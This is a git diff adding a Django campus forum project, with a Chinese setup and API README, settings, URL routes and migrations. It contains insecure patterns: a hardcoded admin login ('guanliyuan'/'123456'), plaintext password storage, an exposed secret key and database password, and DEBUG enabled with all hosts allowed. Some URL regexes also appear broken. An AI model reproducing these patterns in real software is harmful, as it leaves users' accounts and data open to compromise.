diff --git a/README.md b/README.md
new file mode 100644
index 0000000..0f6bd13
--- /dev/null
+++ b/README.md
@@ -0,0 +1,373 @@
+# ForumSystem
+# 滑动师范大学论坛
+### 环境配置
+
+一、更新系统软件包
+yum update -y
+二、安装软件管理包和可能使用的依赖
+yum -y groupinstall "Development tools"
+yum install openssl-devel bzip2-devel expat-devel gdbm-devel readline-devel sqlite-devel psmisc libffi-devel
+三、下载Pyhton3到/usr/local 目录
+cd /usr/local
+wget https://www.python.org/ftp/python/3.6.6/Python-3.6.6.tgz
+解压
+tar -zxvf Python-3.6.6.tgz
+进入 Python-3.6.6路径
+cd Python-3.6.6
+编译安装到指定路径
+./configure --prefix=/usr/local/python3
+安装python3
+make
+make install
+python3建立软连接:ln -s /usr/local/python3/bin/python3.6 /usr/bin/python3
+同样给pip3建立软链接:ln -s /usr/local/python3/bin/pip3.6 /usr/bin/pip3
+四、安装virtualenv
+pip3 install virtualenv
+建立软链接
+ln -s /usr/local/python3/bin/virtualenv /usr/bin/virtualenv
+五、下载并安装MySQL
+wget -i -c http://dev.mysql.com/get/mysql57-community-release-el7-10.noarch.rpm
+yum -y install mysql57-community-release-el7-10.noarch.rpm
+yum -y install mysql-community-server
+ MySQL数据库设置: systemctl start mysqld.service
+grep "password" /var/log/mysqld.log
+登录mysql:mysql -uroot -p
+修改密码:ALTER USER 'root'@'localhost' IDENTIFIED BY 'new password';
+创建数据库create database forum,并使用use forum;
+创建/www/wwwroot/目录,并将项目解压至该目录
+在master目录下创建虚拟环境virtualenv --python=/usr/bin/python3 master_venv
+执行source ./master_venv/bin/activate
+修改/master/ForumSystem下settings.py中数据库密码
+回到master目录,在虚拟环境下安装pip3 install django pip3 install pgsql
+pip3 install uwsgi pip3 install -r requirements.txt
+安装requirements.txt出错
+centos安装psycopg2时出错:Error: pg_config executable not found.解决方案
+yum install postgresql-devel*
+使用 pip install psycopg2-binary 安装即可
+再执行pip3 install -r requirements.txt
+六、配置uwsgi配置文件(master同目录下,已创建,可以修改端口)
+[uwsgi]
+master = true
+processes = 1
+threads = 2
+chdir = /www/wwwroot/master
+#wsgi-file= /www/wwwroot/master/
+wsgi-file = /www/wwwroot/master/ForumSystem/wsgi.py
+http = 0.0.0.0:8080
+logto = /www/wwwroot/master/logs/error.log
+chmod-socket = 660
+vacuum = true
+master = true
+max-requests = 1000
+static-map = /static=/www/wwwroot/master/static
+
+在master目录下运行,进行数据库迁移:
+
+python manage.py makemigrations
+python manage.py migrate
+
+在master目录下启动uwsgi
+uwsgi --ini uwsgi.ini
+浏览器输入网址http://ip地址:8080/login 安装成功
+
+
+
+
+## 展示
+### 用户端
+登录
+![image](http://ww1.sinaimg.cn/large/006tNc79ly1g4z46rpj9cj31k10u0drs.jpg)
+主页
+![](http://ww4.sinaimg.cn/large/006tNc79ly1g520s6ijl0j31kl0u0e81.jpg)
+全部帖子
+![](http://ww2.sinaimg.cn/large/006tNc79ly1g520t8nsslj31k10u0qv5.jpg)
+发帖
+![](http://ww1.sinaimg.cn/large/006tNc79ly1g520u2tfwfj31k90u0drc.jpg)
+
+### 管理员端
+帖子管理
+![image](http://ww1.sinaimg.cn/large/006tNc79ly1g4z43fiddwj31jm0u0gy1.jpg)
+公告管理
+![image](http://ww2.sinaimg.cn/large/006tNc79ly1g4z43pup25j31k10u0136.jpg)
+板块(分类)管理
+![image](http://ww3.sinaimg.cn/large/006tNc79ly1g4z44l23y8j31jv0u0131.jpg)
+
+## 功能
+### 用户端功能
+- 注册:用户在注册界面可以提交注册,暂不支持手机短信验证,直接注册。
+- 登录:已注册的用户可以通过正确的用户名和密码登录。
+- 欢迎:主页的导航栏会显示用户名并且欢迎。
+- 查看公告:查看管理员发出的公告。
+- 查看指南:显示在主页的指南。
+- 推荐帖子:每个帖子可以选择推荐在首页显示。
+- 查看类别:可以看到论坛里帖子所有的类别,点击可以查看对应下的帖子。
+- 查看全部帖子:按照时间顺序,查看所有帖子。
+- 帖子筛选:可以根据帖子分类、回复量、发布时间进行组合筛选。
+- 帖子搜索:根据输入关键字查询相关帖子。
+- 发帖:普通用户可以发帖。
+- 查看帖子详细:可以看到帖子的发布时间,作者,类别,标题,简介,详细内容,所有留言信息。
+- 留言:可以在帖子下面发表文字或者图片留言(评论),暂不支持回复评论。
+
+
+## 系统说明
+
+### 数据库
+项目采用mysql进行存储,我使用的是mysql 8.0.16。表之间不采用任何外键关联,逻辑的管理都在控制层完成。每个表的id都由Django自动创建,也同时作为主键。
+#### 表与字段
+##### 用户表:User
+字段名称 | 字段类型 | 字段说明
+---|---|---
+id | int | 编号,自增,主键
+uid | vchar(16) | 用户名,唯一
+password | vchar(16) | 密码
+create_time | Date | 创建日期
+##### 帖子表:Topic
+字段名称 | 字段类型 | 字段说明
+---|---|---
+id | int | 编号,自增,主键
+t_uid | vchar(16) | 帖子作者
+t_kind | vchar(32) | 帖子类型
+create_time | Date | 帖子发布日期
+t_photo | vchar(128) | 帖子主页图,允许为空
+t_content | vchar(3000) | 帖子内容
+t_title | vchar(64) | 帖子标题
+t_introduce | vchar(256) | 帖子介绍
+recommend | boolean | 是否推荐到主页,默认false
+##### 回复表:Reply
+字段名称 | 字段类型 | 字段说明
+---|---|---
+id | int | 编号,自增,主键
+r_tid | vchar(16) | 回复的帖子
+r_uid | vchar(16) | 发表回复的人
+r_time | Date | 回复时间
+r_photo | vchar(128) | 回复图片,允许为空
+r_content | vchar(256) | 回复内容
+##### 分类表:Kind
+字段名称 | 字段类型 | 字段说明
+---|---|---
+id | int | 编号,自增,主键
+k_name | vchar(16) | 分类名称
+##### 公告表:Announcement
+字段名称 | 字段类型 | 字段说明
+---|---|---
+id | int | 编号,自增,主键
+a_title | vchar(64) | 公告名称
+a_content | vchar(3000) | 公告内容,允许为空
+
+#### 数据库代码
+数据库代码在模型(models)层:参见/ForumSystem/app01/models.py
+
+
+
+### 用户端
+#### 用户端前端
+- 主页:
+ - 显示公告:模板和数据渲染生成
+ - 显示指南:html固定内容
+ - 显示导航栏
+ - 登陆后显示:主页、发帖、看帖、欢迎、退出
+ - 未登录显示:主页、发帖(点击会跳转到登录)、看帖、登录。
+ - 显示推荐帖子:模板和数据渲染生成
+ - 显示全部帖子按钮:页面固定
+ - 底部栏:显示名称和导航栏
+- 登录&注册页面:
+ - 一个输入框:分为用户名和密码
+ - 两个按钮(登录/注册)
+ - 通过ajax发送登录或者注册请求
+- 全部帖子页面:
+ - 论坛名称(左上角):固定显示
+ - 搜索框:固定,form表单post提交
+ - 导航栏:同上
+ - 组合筛选栏
+ - 分类筛选:模板和数据渲染得到所有分类显示
+ - 回复数量筛选:固定
+ - 发布时间筛选:固定
+ - 显示全部帖子:模板和数据渲染获取
+- 帖子详情页面:模板和数据渲染获取
+ - 论坛名称:同上
+ - 导航栏:同上
+ - 帖子主图
+ - 帖子标题和详细内容
+ - 帖子作者、发布时间、分类
+ - 发表留言栏:form表单,post提交
+ - 显示所有留言:模板和数据渲染获取
+- 公告详情页面:
+ - 公告标题
+ - 公告内容
+- 发布帖子页面:
+ - 一个大form表单,包括帖子的标题、简介、内容、封面图、类别(下拉选择)。
+- 修改密码页面:
+ - 用户名框(只显示,不可改)
+ - 原密码框
+ - 新密码框
+ - 确认新密码框
+ - 提交(成功后返回主页)、取消(返回主页)按钮
+
+#### 用户端接口
+##### 主页
+- url:http://127.0.0.1:8000/home/
+- GET请求
+ - 参数:无
+ - 返回值:10个最新公告列表,所有推荐贴列表,渲染好的**页面**。
+
+##### 所有帖子
+- url:http://127.0.0.1:8000/all-0-0-0
+- GET请求
+ - url说明:后3个0指组合筛选不进行筛选
+ - 参数:无,也可以说是all后面的3个数字(kid, reply_limit, time_limit)
+ - 返回值:根据3个参数选择后的**帖子列表**
+- POST请求:
+ - 参数
+ - keys:搜索关键字
+ - 返回值:根据关键字搜索到的**帖子列表**
+
+##### 登录、注册
+- url:http://127.0.0.1:8000/login/
+- GET请求:
+ - 参数:无
+ - 返回值:登录页面
+- POST请求:
+ - 参数:
+ - type:login 或者 register
+ - uid:用户名
+ - pwd:密码
+ - 返回值:
+ - msg:信息
+ - status:状态,成功与否
+
+##### 发布帖子
+- url:http://127.0.0.1:8000/publish/
+- GET请求:
+ - 参数:无
+ - 返回值:发布帖子页面
+- POST请求:
+ - 参数:
+ - t_title:标题
+ - t_introduce:介绍
+ - t_content:内容
+ - t_kind:类别
+ - t_photo:主图
+ - 返回值:
+ - 成功后重定向到单个帖子页面
+
+##### 单个帖子
+- url:http://127.0.0.1:8000/single/1/
+- GET请求:
+ - url说明:1就是tid
+ - 参数:tid
+ - 返回值:帖子相关所有信息,渲染成单个帖子详情页面
+- POST请求:主要用于评论的发表和删除
+ - 参数:
+ - type:类型,删除评论还是发表评论
+ - r_content:评论内容
+ - r_photo:评论图片
+ - r_id:回复id,删除已有回复才用到
+ - 返回值:
+ - msg:信息
+ - status:状态,成功与否
+
+##### 修改密码
+- url:http://127.0.0.1:8000/edit-pwd/
+- GET请求:
+ - 参数:无
+ - 返回值:修改密码页面
+- POST请求:
+ - 参数:
+ - old_pwd:旧密码
+ - new_pwd1:新密码
+ - new_pwd2:确认新密码
+ - 返回值:
+ - 成功后重定向到主页
+
+
+### 管理员端
+#### 管理员前端
+- 管理员登录:
+ - 一个输入框:分为用户名和密码
+ - 两个按钮(登录/取消)
+ - 一个form表单,提交数据
+- 帖子管理:
+ - 导航栏:帖子管理、公告管理、分类管理
+ - 欢迎头部
+ - 帖子列表:序号、名称、简介、推荐、操作
+ - 推荐操作:绑定ajax,刷新页面
+ - 取消推荐操作:ajax,刷新
+ - 查看操作:跳转帖子详情页面
+ - 删除操作:ajax,同时刷新
+- 公告管理:
+ - 导航栏:帖子管理、公告管理、分类管理
+ - 欢迎头部
+ - 公告列表:序号、标题、操作
+ - 查看操作:跳转公告详情页面
+ - 删除操作:ajax,同时刷新
+- 分类(板块)管理:
+ - 导航栏:帖子管理、公告管理、分类管理
+ - 欢迎头部
+ - 分类列表:序号、分类名称、操作
+ - 查看该分类下所有帖子操作:跳转到全部帖子下组合搜索出分类里的帖子
+ - 删除操作:ajax,同时刷新
+
+
+#### 管理员接口
+##### 登录
+- url:http://127.0.0.1:8000/my-admin/
+- GET请求:
+ - 参数:无
+ - 返回值:管理员登录页面
+- POST请求:
+ - 参数:
+ - admin_id:管理员用户名
+ - admin_pwd:管理员密码
+ - 返回值:
+ - 成功后重定向到帖子管理页面
+ - 注意:管理员我没有做表去存放管理员账号密码,所以在程序里写死了管理员账号为guanliyuan,密码为123456
+
+##### 帖子管理
+- url:http://127.0.0.1:8000/admin-home/
+- GET请求:
+ - 参数:无
+ - 返回值:所有帖子信息,渲染后的帖子管理页面,需要验证管理员是否登录(使用session)
+- POST请求:
+ - 参数:
+ - type:post请求类型(以下为type可用的值)
+ - zhiding:置顶(推荐)
+ - qzhiding:取消置顶
+ - delete:删除
+ - t_id:帖子id,根据帖子id进行type操作
+ - 返回值:
+ - msg:信息
+ - status:成功与否状态
+
+##### 公告管理
+- url:http://127.0.0.1:8000/announcement/
+- GET请求:
+ - 参数:无
+ - 返回值:所有公告信息,渲染后的公告管理页面,需要验证管理员是否登录(使用session)
+- POST请求:
+ - 参数:
+ - type:post请求类型
+ - create:创建公告
+ - delete:删除公告
+ - a_id:公告id,如果type=delete需要公告id
+ - a_title:公告标题,如果type=create,需要公告标题
+ - a_content:公告内容,如果type=create,需要公告标题
+ - 返回值:
+ - msg:信息
+ - status:成功与否状态
+
+##### 分类管理
+- url:http://127.0.0.1:8000/kind-manage/
+- GET请求:
+ - 参数:无
+ - 返回值:所有分类信息,渲染后的类别管理页面,需要验证管理员是否登录(使用session)
+- POST请求:
+ - 参数:
+ - type:post请求类型(删除or创建)
+ - create:创建类别
+ - delete:删除类别
+ - k_id:类别id,如果type=delete需要类别id
+ - k_name:类别名称,如果type=create,需要类别名称
+ - 返回值:
+ - msg:信息
+ - status:成功与否状态
+
diff --git a/master/.DS_Store b/master/.DS_Store
new file mode 100644
index 0000000..2c49336
Binary files /dev/null and b/master/.DS_Store differ
diff --git a/master/.idea/.gitignore b/master/.idea/.gitignore
new file mode 100644
index 0000000..73f69e0
--- /dev/null
+++ b/master/.idea/.gitignore
@@ -0,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml
+# Editor-based HTTP Client requests
+/httpRequests/
diff --git a/master/.idea/ForumSystem.iml b/master/.idea/ForumSystem.iml
new file mode 100644
index 0000000..cdd1605
--- /dev/null
+++ b/master/.idea/ForumSystem.iml
@@ -0,0 +1,34 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/master/.idea/dataSources.xml b/master/.idea/dataSources.xml
new file mode 100644
index 0000000..def27e8
--- /dev/null
+++ b/master/.idea/dataSources.xml
@@ -0,0 +1,19 @@
+
+
+
+
+ mysql.8
+ true
+ com.mysql.cj.jdbc.Driver
+ jdbc:mysql://localhost:3306/forum_system
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/master/.idea/dictionaries/likunhong.xml b/master/.idea/dictionaries/likunhong.xml
new file mode 100644
index 0000000..d38bbda
--- /dev/null
+++ b/master/.idea/dictionaries/likunhong.xml
@@ -0,0 +1,3 @@
+
+
+
\ No newline at end of file
diff --git a/master/.idea/inspectionProfiles/Project_Default.xml b/master/.idea/inspectionProfiles/Project_Default.xml
new file mode 100644
index 0000000..4065dcc
--- /dev/null
+++ b/master/.idea/inspectionProfiles/Project_Default.xml
@@ -0,0 +1,20 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/master/.idea/libraries/R_User_Library.xml b/master/.idea/libraries/R_User_Library.xml
new file mode 100644
index 0000000..71f5ff7
--- /dev/null
+++ b/master/.idea/libraries/R_User_Library.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/master/.idea/misc.xml b/master/.idea/misc.xml
new file mode 100644
index 0000000..a9940b6
--- /dev/null
+++ b/master/.idea/misc.xml
@@ -0,0 +1,30 @@
+
+
+
+
+
+
+
+
+
+
+
+ CSS
+
+
+ Probable bugsCSS
+
+
+ RELAX NG
+
+
+
+
+ Angular
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/master/.idea/modules.xml b/master/.idea/modules.xml
new file mode 100644
index 0000000..711b5b7
--- /dev/null
+++ b/master/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/master/.idea/vcs.xml b/master/.idea/vcs.xml
new file mode 100644
index 0000000..94a25f7
--- /dev/null
+++ b/master/.idea/vcs.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/master/ForumSystem/__init__.py b/master/ForumSystem/__init__.py
new file mode 100644
index 0000000..26576f4
--- /dev/null
+++ b/master/ForumSystem/__init__.py
@@ -0,0 +1,5 @@
+import pymysql
+
+pymysql.version_info = (1, 4, 13, "final", 0)
+
+pymysql.install_as_MySQLdb()
\ No newline at end of file
diff --git a/master/ForumSystem/__pycache__/__init__.cpython-36.pyc b/master/ForumSystem/__pycache__/__init__.cpython-36.pyc
new file mode 100644
index 0000000..980e5a9
Binary files /dev/null and b/master/ForumSystem/__pycache__/__init__.cpython-36.pyc differ
diff --git a/master/ForumSystem/__pycache__/__init__.cpython-37.pyc b/master/ForumSystem/__pycache__/__init__.cpython-37.pyc
new file mode 100644
index 0000000..6d25b7e
Binary files /dev/null and b/master/ForumSystem/__pycache__/__init__.cpython-37.pyc differ
diff --git a/master/ForumSystem/__pycache__/settings.cpython-36.pyc b/master/ForumSystem/__pycache__/settings.cpython-36.pyc
new file mode 100644
index 0000000..5d2e81a
Binary files /dev/null and b/master/ForumSystem/__pycache__/settings.cpython-36.pyc differ
diff --git a/master/ForumSystem/__pycache__/settings.cpython-37.pyc b/master/ForumSystem/__pycache__/settings.cpython-37.pyc
new file mode 100644
index 0000000..bbfff2c
Binary files /dev/null and b/master/ForumSystem/__pycache__/settings.cpython-37.pyc differ
diff --git a/master/ForumSystem/__pycache__/urls.cpython-36.pyc b/master/ForumSystem/__pycache__/urls.cpython-36.pyc
new file mode 100644
index 0000000..a5c9f89
Binary files /dev/null and b/master/ForumSystem/__pycache__/urls.cpython-36.pyc differ
diff --git a/master/ForumSystem/__pycache__/urls.cpython-37.pyc b/master/ForumSystem/__pycache__/urls.cpython-37.pyc
new file mode 100644
index 0000000..b34b71a
Binary files /dev/null and b/master/ForumSystem/__pycache__/urls.cpython-37.pyc differ
diff --git a/master/ForumSystem/__pycache__/wsgi.cpython-37.pyc b/master/ForumSystem/__pycache__/wsgi.cpython-37.pyc
new file mode 100644
index 0000000..b7ab74b
Binary files /dev/null and b/master/ForumSystem/__pycache__/wsgi.cpython-37.pyc differ
diff --git a/master/ForumSystem/settings.py b/master/ForumSystem/settings.py
new file mode 100644
index 0000000..c969bc8
--- /dev/null
+++ b/master/ForumSystem/settings.py
@@ -0,0 +1,145 @@
+"""
+Django settings for ForumSystem project.
+
+Generated by 'django-admin startproject' using Django 2.1.4.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/2.1/topics/settings/
+
+For the full list of settings and their values, see
+https://docs.djangoproject.com/en/2.1/ref/settings/
+"""
+
+import os
+
+# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
+BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+
+
+# Quick-start development settings - unsuitable for production
+# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
+
+# SECURITY WARNING: keep the secret key used in production secret!
+SECRET_KEY = 'e(!)-kb_kqw5p@%u!6ak6u2$db5-4h@c#u)dwrcw^xp5m-q(q$'
+
+# SECURITY WARNING: don't run with debug turned on in production!
+DEBUG = True
+
+ALLOWED_HOSTS = [
+ '*'
+]
+
+
+# Application definition
+
+INSTALLED_APPS = [
+ 'django.contrib.admin',
+ 'django.contrib.auth',
+ 'django.contrib.contenttypes',
+ 'django.contrib.sessions',
+ 'django.contrib.messages',
+ 'django.contrib.staticfiles',
+ 'app01.apps.App01Config',
+]
+
+MIDDLEWARE = [
+ 'django.middleware.security.SecurityMiddleware',
+ 'django.contrib.sessions.middleware.SessionMiddleware',
+ 'django.middleware.common.CommonMiddleware',
+ 'django.middleware.csrf.CsrfViewMiddleware',
+ 'django.contrib.auth.middleware.AuthenticationMiddleware',
+ 'django.contrib.messages.middleware.MessageMiddleware',
+ 'django.middleware.clickjacking.XFrameOptionsMiddleware',
+]
+
+ROOT_URLCONF = 'ForumSystem.urls'
+
+TEMPLATES = [
+ {
+ 'BACKEND': 'django.template.backends.django.DjangoTemplates',
+ 'DIRS': [os.path.join(BASE_DIR, 'templates')]
+ ,
+ 'APP_DIRS': True,
+ 'OPTIONS': {
+ 'context_processors': [
+ 'django.template.context_processors.debug',
+ 'django.template.context_processors.request',
+ 'django.contrib.auth.context_processors.auth',
+ 'django.contrib.messages.context_processors.messages',
+ ],
+ },
+ },
+]
+
+WSGI_APPLICATION = 'ForumSystem.wsgi.application'
+
+
+# Database
+# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
+
+# DATABASES = {
+# 'default': {
+# 'ENGINE': 'django.db.backends.sqlite3',
+# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
+# }
+# }
+DATABASES = {
+ 'default': {
+ 'ENGINE': 'django.db.backends.mysql',
+ 'HOST': '',
+ 'NAME': 'forum', #你的数据库名称
+ 'USER': 'root', #你的数据库用户名
+ 'PASSWORD': 'xsh_123_XSH',
+ 'PORT': '3306',
+ }
+}
+
+
+# Password validation
+# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
+
+AUTH_PASSWORD_VALIDATORS = [
+ {
+ 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
+ },
+ {
+ 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
+ },
+ {
+ 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
+ },
+ {
+ 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
+ },
+]
+
+
+# Internationalization
+# https://docs.djangoproject.com/en/2.1/topics/i18n/
+
+# LANGUAGE_CODE = 'en-us'
+
+# TIME_ZONE = 'UTC'
+
+LANGUAGE_CODE = 'zh-hans'
+
+TIME_ZONE = 'Asia/Shanghai'
+
+USE_I18N = True
+
+USE_L10N = True
+
+USE_TZ = True
+
+
+# Static files (CSS, JavaScript, Images)
+# https://docs.djangoproject.com/en/2.1/howto/static-files/
+
+STATIC_URL = '/static/'
+# STATIC_ROOT = os.path.join(BASE_DIR,'static')
+# STATIC_URL = '/static/'
+STATIC_ROOT = os.path.join(BASE_DIR, "static")
+
+STATICFILES_DIRS = (
+ os.path.join(BASE_DIR, 'static'),
+)
diff --git a/master/ForumSystem/urls.py b/master/ForumSystem/urls.py
new file mode 100644
index 0000000..aa7a2d5
--- /dev/null
+++ b/master/ForumSystem/urls.py
@@ -0,0 +1,36 @@
+"""ForumSystem URL Configuration
+
+The `urlpatterns` list routes URLs to views. For more information please see:
+ https://docs.djangoproject.com/en/2.1/topics/http/urls/
+Examples:
+Function views
+ 1. Add an import: from my_app import views
+ 2. Add a URL to urlpatterns: path('', views.home, name='home')
+Class-based views
+ 1. Add an import: from other_app.views import Home
+ 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
+Including another URLconf
+ 1. Import the include() function: from django.urls import include, path
+ 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
+"""
+from django.contrib import admin
+from django.urls import path
+from app01 import views
+from django.conf.urls import url
+
+urlpatterns = [
+ path('admin/', admin.site.urls),
+ # url(r'^all/', views.all_tie), # 全部帖子
+ url(r'^ownpublish-(?P\d+)-(?P\d+)-(?P\d+)', views.ownpublish), # 按条件搜索自己帖子
+ url(r'^all-(?P\d+)-(?P\d+)-(?P\d+)', views.all_tie), # 按条件搜索帖子
+ url(r'^home/', views.home), # 主页
+ url(r'^login/', views.login), # 登录注册
+ url(r'^publish/', views.publish), # 发布帖子
+ url(r'^single/(?P\d+)/', views.single), # 单个帖子
+ url(r'^edit-pwd/', views.edit_pwd), # 修改密码
+ url(r'^my-admin/', views.admin), # 修改密码
+ url(r'^announcement/', views.announcement), # 公告管理
+ url(r'^admin-home/', views.topic_manage), # 帖子管理,也是主页面
+ url(r'^kind-manage/', views.kind_manage), # 板块管理
+ url(r'^single-an-(?P\d+)/', views.single_an), # 单个公告显示
+]
diff --git a/master/ForumSystem/wsgi.py b/master/ForumSystem/wsgi.py
new file mode 100644
index 0000000..8682e10
--- /dev/null
+++ b/master/ForumSystem/wsgi.py
@@ -0,0 +1,15 @@
+"""
+WSGI config for ForumSystem project.
+
+It exposes the WSGI callable as a module-level variable named ``application``.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
+"""
+
+import os
+
+from django.core.wsgi import get_wsgi_application
+
+os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ForumSystem.settings')
+application = get_wsgi_application()
diff --git a/master/__pycache__/manage.cpython-37.pyc b/master/__pycache__/manage.cpython-37.pyc
new file mode 100644
index 0000000..a29d2f5
Binary files /dev/null and b/master/__pycache__/manage.cpython-37.pyc differ
diff --git a/master/app01/__init__.py b/master/app01/__init__.py
new file mode 100644
index 0000000..26576f4
--- /dev/null
+++ b/master/app01/__init__.py
@@ -0,0 +1,5 @@
+import pymysql
+
+pymysql.version_info = (1, 4, 13, "final", 0)
+
+pymysql.install_as_MySQLdb()
\ No newline at end of file
diff --git a/master/app01/__pycache__/__init__.cpython-36.pyc b/master/app01/__pycache__/__init__.cpython-36.pyc
new file mode 100644
index 0000000..d898127
Binary files /dev/null and b/master/app01/__pycache__/__init__.cpython-36.pyc differ
diff --git a/master/app01/__pycache__/__init__.cpython-37.pyc b/master/app01/__pycache__/__init__.cpython-37.pyc
new file mode 100644
index 0000000..609115a
Binary files /dev/null and b/master/app01/__pycache__/__init__.cpython-37.pyc differ
diff --git a/master/app01/__pycache__/admin.cpython-36.pyc b/master/app01/__pycache__/admin.cpython-36.pyc
new file mode 100644
index 0000000..a010739
Binary files /dev/null and b/master/app01/__pycache__/admin.cpython-36.pyc differ
diff --git a/master/app01/__pycache__/admin.cpython-37.pyc b/master/app01/__pycache__/admin.cpython-37.pyc
new file mode 100644
index 0000000..6c5e63b
Binary files /dev/null and b/master/app01/__pycache__/admin.cpython-37.pyc differ
diff --git a/master/app01/__pycache__/apps.cpython-36.pyc b/master/app01/__pycache__/apps.cpython-36.pyc
new file mode 100644
index 0000000..2d517da
Binary files /dev/null and b/master/app01/__pycache__/apps.cpython-36.pyc differ
diff --git a/master/app01/__pycache__/apps.cpython-37.pyc b/master/app01/__pycache__/apps.cpython-37.pyc
new file mode 100644
index 0000000..5a7bfae
Binary files /dev/null and b/master/app01/__pycache__/apps.cpython-37.pyc differ
diff --git a/master/app01/__pycache__/models.cpython-36.pyc b/master/app01/__pycache__/models.cpython-36.pyc
new file mode 100644
index 0000000..27a6e62
Binary files /dev/null and b/master/app01/__pycache__/models.cpython-36.pyc differ
diff --git a/master/app01/__pycache__/models.cpython-37.pyc b/master/app01/__pycache__/models.cpython-37.pyc
new file mode 100644
index 0000000..bcfc46b
Binary files /dev/null and b/master/app01/__pycache__/models.cpython-37.pyc differ
diff --git a/master/app01/__pycache__/views.cpython-36.pyc b/master/app01/__pycache__/views.cpython-36.pyc
new file mode 100644
index 0000000..1aa248c
Binary files /dev/null and b/master/app01/__pycache__/views.cpython-36.pyc differ
diff --git a/master/app01/__pycache__/views.cpython-37.pyc b/master/app01/__pycache__/views.cpython-37.pyc
new file mode 100644
index 0000000..4ac0586
Binary files /dev/null and b/master/app01/__pycache__/views.cpython-37.pyc differ
diff --git a/master/app01/admin.py b/master/app01/admin.py
new file mode 100644
index 0000000..8c38f3f
--- /dev/null
+++ b/master/app01/admin.py
@@ -0,0 +1,3 @@
+from django.contrib import admin
+
+# Register your models here.
diff --git a/master/app01/apps.py b/master/app01/apps.py
new file mode 100644
index 0000000..84e8b6f
--- /dev/null
+++ b/master/app01/apps.py
@@ -0,0 +1,5 @@
+from django.apps import AppConfig
+
+
+class App01Config(AppConfig):
+ name = 'app01'
diff --git a/master/app01/migrations/0001_initial.py b/master/app01/migrations/0001_initial.py
new file mode 100644
index 0000000..5592de0
--- /dev/null
+++ b/master/app01/migrations/0001_initial.py
@@ -0,0 +1,65 @@
+# Generated by Django 2.1.4 on 2019-07-02 04:07
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+ initial = True
+
+ dependencies = [
+ ]
+
+ operations = [
+ migrations.CreateModel(
+ name='Announcement',
+ fields=[
+ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+ ('a_id', models.CharField(max_length=16, verbose_name='公告id')),
+ ('a_title', models.CharField(max_length=16, verbose_name='公告标题')),
+ ('a_content', models.CharField(max_length=16, null=True, verbose_name='公告内容')),
+ ],
+ ),
+ migrations.CreateModel(
+ name='Kind',
+ fields=[
+ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+ ('k_id', models.CharField(max_length=16, verbose_name='分类id')),
+ ('k_name', models.CharField(max_length=16, verbose_name='分类名称')),
+ ],
+ ),
+ migrations.CreateModel(
+ name='Reply',
+ fields=[
+ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+ ('r_tid', models.CharField(max_length=16, verbose_name='帖子id')),
+ ('r_uid', models.CharField(max_length=16, verbose_name='发表者id')),
+ ('r_photo', models.CharField(max_length=128, null=True, verbose_name='回复的图片')),
+ ('r_time', models.DateField(auto_now_add=True, verbose_name='留言时间')),
+ ('r_content', models.CharField(max_length=256, verbose_name='回复内容')),
+ ],
+ ),
+ migrations.CreateModel(
+ name='Topic',
+ fields=[
+ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+ ('t_id', models.CharField(max_length=16, verbose_name='帖子id')),
+ ('t_uid', models.CharField(max_length=16, verbose_name='帖子所属用户id')),
+ ('t_kind', models.CharField(max_length=32, verbose_name='类别')),
+ ('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
+ ('t_photo', models.CharField(max_length=128, null=True, verbose_name='帖子图片')),
+ ('t_content', models.CharField(max_length=3000, verbose_name='帖子正文')),
+ ('t_title', models.CharField(max_length=64, verbose_name='帖子标题')),
+ ('t_introduce', models.CharField(max_length=256, verbose_name='帖子简介')),
+ ],
+ ),
+ migrations.CreateModel(
+ name='User',
+ fields=[
+ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
+ ('uid', models.CharField(max_length=16, unique=True, verbose_name='电话/用户号')),
+ ('password', models.CharField(max_length=16, verbose_name='密码')),
+ ('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
+ ],
+ ),
+ ]
diff --git a/master/app01/migrations/0002_auto_20190703_0151.py b/master/app01/migrations/0002_auto_20190703_0151.py
new file mode 100644
index 0000000..0693a83
--- /dev/null
+++ b/master/app01/migrations/0002_auto_20190703_0151.py
@@ -0,0 +1,28 @@
+# Generated by Django 2.1.4 on 2019-07-03 01:51
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ('app01', '0001_initial'),
+ ]
+
+ operations = [
+ migrations.AddField(
+ model_name='topic',
+ name='recommend',
+ field=models.BooleanField(default=False, verbose_name='是否推荐'),
+ ),
+ migrations.AlterField(
+ model_name='announcement',
+ name='a_content',
